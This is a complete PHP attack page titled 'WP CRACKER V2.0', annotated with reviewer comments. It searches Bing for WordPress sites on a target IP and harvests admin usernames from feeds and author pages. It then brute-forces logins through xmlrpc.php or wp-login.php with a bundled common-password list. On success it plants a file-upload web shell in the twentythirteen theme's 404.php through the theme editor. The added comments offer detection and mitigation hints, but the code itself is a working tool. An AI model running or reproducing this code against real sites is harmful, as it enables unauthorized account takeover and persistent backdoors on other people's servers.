<html>
<title>WP CRACKER V2.0</title>
<style>
body{background-color:#f1f1f1;}
input,select,textarea{
	border:1px solid #4F4F4F; font-family:Verdana; font-size:11px;
}
</style>
<center>
<table cellpadding='5'>
<tr><td align=center><h2>WP CRACKER V2.0</h2></td></tr>
<?php
#WP CRACKER V2.0
#INJ3CTOR_M4
# Review note: this is a self-hosted attack page — a WordPress credential-guessing
# tool that, after a successful guess, writes a file-upload backdoor through the
# theme editor. The comments below describe what the visible code does.
@set_time_limit(0);
error_reporting(0); # every warning is suppressed, including curl and fopen failures

# Request 1 (no 'brute' field): draw the form. When an 'ip' was posted, the
# site list is pre-filled from a Bing search for that IP; otherwise it is empty.
if(!isset($_POST['brute'])){
	echo'<tr><td align="center">';
	echo'<b>Server iP:</b>';
	echo'<form method="POST">';
	echo'<input size="60" type="text" name="ip" placeholder="Put Target Server iP">';
	echo'<input type="submit" value="Grab_WP!"></td></tr></table>';
	echo'<table cellpadding="5">';
	echo'<tr><td align="center"><b>Web-Sites List</b></td><td align="center"><b>Passwords</b></td></tr>';
	if(!isset($_POST['ip'])){
		echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23" placeholder="http://localhost/"></textarea></td>';
	}else{
		$ip = trim($_POST['ip']); # not validated beyond trim(); goes straight into the search string
		# Two query-string fragments typical of WordPress permalinks.
		$dorks = array('/?page_id=', '/?p=');
		foreach($dorks as $dork){
			$query = "ip:$ip $dork";
			$allLinks = bingServerCrawler($query);
			# bingServerCrawler() returns null when nothing matched; iterating null
			# only raises a (suppressed) warning.
			foreach($allLinks as $link){
				# Keep the directory part of each hit and confirm it is WordPress
				# through the wlwmanifest.xml file WordPress ships in wp-includes.
				if(eregi("page_id=|p=", $link)){	$link = pathinfo($link)['dirname'];
					$data = get_source($link	.	"/wp-includes/wlwmanifest.xml");
					if(preg_match('#<clientType>WordPress</clientType>#i', $data)){
						$wpLinks[] = $link;
					}
				}
			}
		}
		# $wpLinks is undefined when no site was confirmed; empty() tolerates that.
		if(!empty($wpLinks)){	$wpLinks = array_unique($wpLinks);
			echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23">';
			foreach($wpLinks as $wordpress){
				echo $wordpress	."\r\n";
			}
			echo'</textarea></td>';
		}
	}
	# Default password list shown in the second textarea; the user may edit it.
	echo'<td><textarea name="passwords" cols="32" rows="23">';
echo'
00000
000000
0000000
00000000
0123456789
102030
111111
112233
123
123123
12345
123456
1234567
12345678
123456789
321321
654321
admin
adminadmin
admin123
admin123123
admin1234
admin123456
administrator
abc123
demo
qwerty
qwerty123
passwd
password
p@ssw0rd
passw0rd
passwords
pass123
pass121
pass
pass1234
test
test123
root
toor
user
welcome1
welcome
';
	echo'</textarea></td></tr></table>';
	echo'<table cellpadding="5">';
	echo'<tr><td align="center"><input type="submit" name="brute" value="Start BruteForce!"/></form></td></tr></table>';
}else{
	# Request 2: the posted site and password lists are split on CRLF and
	# de-duplicated. Neither value is validated or escaped before being echoed
	# and appended to rezult.html, so the results page reflects whatever was posted.
	$sites = array_unique(array_map("trim", explode("\r\n", $_POST['sites'])));
	$passwords = array_unique(array_map("trim", explode("\r\n", $_POST['passwords'])));
	$f = fopen('rezult.html', 'a+'); # results log next to the script; the handle is never checked
	echo'<table border="1" cellpadding="5">';
	foreach($sites as $site){
		$site = rtrim($site, '/');
		vbflush(); # buffer clean
		echo"<tr><td><b>Target --> $site</b></td></tr>";
		fwrite($f, "<br />target --> <b>$site</b><br />");
		$user = admin_wp($site); # username read from the site's feed/author page, "admin" as fallback
		echo"<tr><td>Username is: <b>$user</b></td>";
		fwrite($f, "Username: <b>$user</b><br />");
		foreach($passwords as $pass){
			# One login attempt per password; the loop stops at the first success.
			if(WP_CRACKER($site, $user,$pass) == true){
				vbflush(); # buffer clean
				echo"<tr><td><b><font color='green'>Password is: $pass</font></b></td></tr>";
				fwrite($f, "Password: <b>$pass</b><br />");
				# With the session now stored in cookie.txt, try to overwrite the theme's 404.php.
				if(uploadshell($site) == true){
					echo"<tr><td><b><font color='green'>Shell Uploaded: $site/wp-content/themes/twentythirteen/404.php</font></b></td></tr>";
					fwrite($f, "Shell: <b>$site/wp-content/themes/twentythirteen/404.php</b><br />");
				}else{
					echo'<tr><td><font color="red">Can\'t Upload Shell!</font></td></tr>';
				}
				break;
			}else{
				vbflush(); # buffer clean
				echo"<tr><td><font color='red'>$pass NO!</font></td></tr>";
			}
		}
	}
	fclose($f);
}
echo'</table>';
// Functions //
# Collects result links from Bing for the search string $dork, one page of ten
# results at a time (the `first` query parameter), stopping when the page has no
# "next" pager element. Cookies persist in cookie.txt and a phone User-Agent is
# sent (presumably to obtain Bing's simpler markup — not confirmed here).
# Returns the unique list of links, or null (implicit) when nothing matched.
function bingServerCrawler($dork){
	$ch = curl_init();
	$i = 1; # 1-based offset of the first result on the requested page
	while($i){ # $i only grows, so the loop ends via the break below
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q="	.	urlencode($dork)	.	"&first={$i}");
		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
		curl_setopt($ch, CURLOPT_USERAGENT, "SamsungI8910/SymbianOS/9.1 Series60/3.0");
		curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate, compress");
		$data = curl_exec($ch);
		# Result anchors as rendered by the Bing markup this was written against.
		preg_match_all('#<h2 class="sb_h3 cttl"><a href="(.*?)"#i', $data, $matches);
		foreach($matches[1] as $link){
			$allLinks[] = $link;
		}
		if(!preg_match('#class="sb_pagN"#i', $data)) break; # no "next page" control
		$i+=10;
	}
	curl_close($ch);
	# $allLinks is undefined when no page matched; empty() tolerates that.
	if(!empty($allLinks) && is_array($allLinks)){
		return array_unique($allLinks);
	}
}
# Fetches the body of $link and returns it as a string (or false on a transport
# failure, as curl_exec()/file_get_contents() return).
# $safemode: when exactly true, sleeps one second before the request.
# $agent: User-Agent header; any falsy value selects a Googlebot-like default.
# Falls back to file_get_contents() when the curl extension is unavailable.
# With curl, redirects are followed, the timeout is 30 s and peer certificate
# verification is switched off (CURLOPT_SSL_VERIFYPEER = 0), so HTTPS responses
# are not authenticated.
function get_source($link, $safemode = false, $agent){
	if($safemode === true){
		sleep(1);
	}
	$userAgent = $agent ? $agent : 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)';
	if(!function_exists('curl_init')){
		return file_get_contents($link);
	}
	$handle = curl_init();
	curl_setopt($handle, CURLOPT_URL, $link);
	curl_setopt($handle, CURLOPT_USERAGENT, $userAgent);
	curl_setopt($handle, CURLOPT_TIMEOUT, 30);
	curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($handle, CURLOPT_ENCODING, 0);
	$body = curl_exec($handle);
	curl_close($handle);
	return $body;
}
# Username discovery for the WordPress site $wp. The first <name> element of the
# atom feed is returned when it is 1–15 characters long. When the feed has no
# <name> at all, the ?author=1 page's <body> class is parsed for the author slug,
# with the literal "admin" as the fallback. Returns null (implicit) when the feed
# had a <name> that failed the length check.
function admin_wp($wp){
    $data = get_source($wp    .    "/?feed=atom");
    if(preg_match('#<name>(.*?)</name>#', $data, $user)){
        if(strlen($user[1]) > 0 && strlen($user[1]) <= 15){
            return $user[1];
        }
    }else{
        $data = get_source($wp    .    "/?author=1");
        # $user[1] is the first "author-…" class token, i.e. the author slug.
        if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i', $data, $user)){
            return $user[1];
        }else{
            return "admin";
        }
    }
}
# One credential attempt against $site. When a GET to xmlrpc.php answers with
# "server accepts POST", the pair is sent as a wp.getUsersBlogs XML-RPC call and
# success is read from an <name>isAdmin</name> element in the reply; otherwise
# the pair is posted to wp-login.php and success is inferred from the word
# "logout" anywhere in the response. Both paths store cookies in cookie.txt,
# which uploadshell() relies on afterwards. Returns bool. The curl handle is
# never closed.
# Detection note: either variant shows up as a burst of POSTs to xmlrpc.php or
# wp-login.php from one client with the fixed User-Agent below.
function WP_CRACKER($site, $user, $pass){
	$xmlprc = get_source($site	.'/xmlrpc.php');
	$ch = curl_init();
	if(preg_match('#server accepts POST#i', $xmlprc)){
		curl_setopt($ch, CURLOPT_URL, $site    ."/xmlrpc.php");
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
		curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		$data = curl_exec($ch);
		return (preg_match('#<name>isAdmin</name>#i', $data)) ? true:false;
	}else{
		# Form login; the test cookie mimics what the browser sets before posting.
		curl_setopt($ch, CURLOPT_URL, $site	.'/wp-login.php');
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
		curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check");
		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "log={$user}&pwd={$pass}&wp-submit=Log+In&redirect_to={$site}/wp-admin/&testcookie=1");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		$data = curl_exec($ch);
		return (preg_match('/logout/', $data)) ? true:false;
	}
}
# Post-compromise step. Using the session cookies WP_CRACKER() left in
# cookie.txt, loads the theme editor for twentythirteen/404.php, extracts the
# form's _wpnonce, and posts a replacement file body. $post is a URL-encoded PHP
# file-upload form (the "Uploader By INJ3CTOR_M4" page). The write is confirmed
# by fetching the theme's 404.php and searching for that marker string.
# Returns false when no nonce was found (no valid session, or the editor is not
# available); otherwise the result of the marker check.
# Mitigation note: defining DISALLOW_FILE_EDIT removes the editor this depends on.
function uploadshell($site){
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $site    .'/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen');
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
	curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
	curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
	curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$data = curl_exec($ch);
	curl_close($ch);
	if(preg_match('#name="_wpnonce" value="(.*?)"#', $data, $token)){
		$post = "_wpnonce={$token[1]}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentythirteen%26scrollto%3D0%26updated%3Dtrue&newcontent=%3C%3Fphp%0Aecho%20%27Uploader%20By%20INJ3CTOR_M4%27%3B%0Aecho%27%0A%3Cform%20method%3D%22post%22%20enctype%3D%22multipart%2fform-data%22%3E%0A%3Cinput%20name%3D%22file%22%20type%3D%22file%22%20%2f%3E%0A%3Cinput%20name%3D%22path%22%20type%3D%22text%22%20value%3D%22%27.getcwd%28%29.%27%22%20%2f%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22Up%22%20%2f%3E%0A%3C%2fform%3E%0A%27%3B%0Aif%28isset%28%24_FILES%5B%27file%27%5D%29%20%26%26%20isset%28%24_POST%5B%27path%27%5D%29%29%7B%0A%20%20%20%20if%28move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%24_POST%5B%27path%27%5D.%27%2f%27.%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22green%22%3EFile%20Upload%20Done.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7Delse%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22red%22%3EFile%20Upload%20Error.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7D%0A%7D%0A%3F%3E&action=update&file=404.php&theme=twentythirteen&scrollto=0&docs-list=&submit=Update+File";
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $site    .'/wp-admin/theme-editor.php');
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		$data = curl_exec($ch);
		curl_close($ch);
		# The editor's own response is ignored; success is judged only by re-fetching the file.
		$data = get_source($site	.'/wp-content/themes/twentythirteen/404.php');
		return (preg_match('/Uploader By INJ3CTOR_M4/', $data)) ? true:false;
	}else{	return FALSE;	}
}
# Pushes buffered output to the client so progress rows appear incrementally.
# Whether an ob_gzhandler output handler is installed is determined once and
# cached in a static; in that case nothing is flushed (the original author
# notes that forcing a flush through the gzip handler is harmful). Otherwise
# the current output buffer is flushed (when one exists) and the SAPI buffer
# is flushed as well. Returns nothing.
function vbflush(){
	static $gzipActive = null;
	if($gzipActive === null){
		$handlers = ob_list_handlers();
		$gzipActive = is_array($handlers) && in_array('ob_gzhandler', $handlers);
	}
	if($gzipActive){
		return;
	}
	# ob_get_length() is false when no output buffer is active.
	if(ob_get_length() !== false){
		@ob_flush();
	}
	flush();
}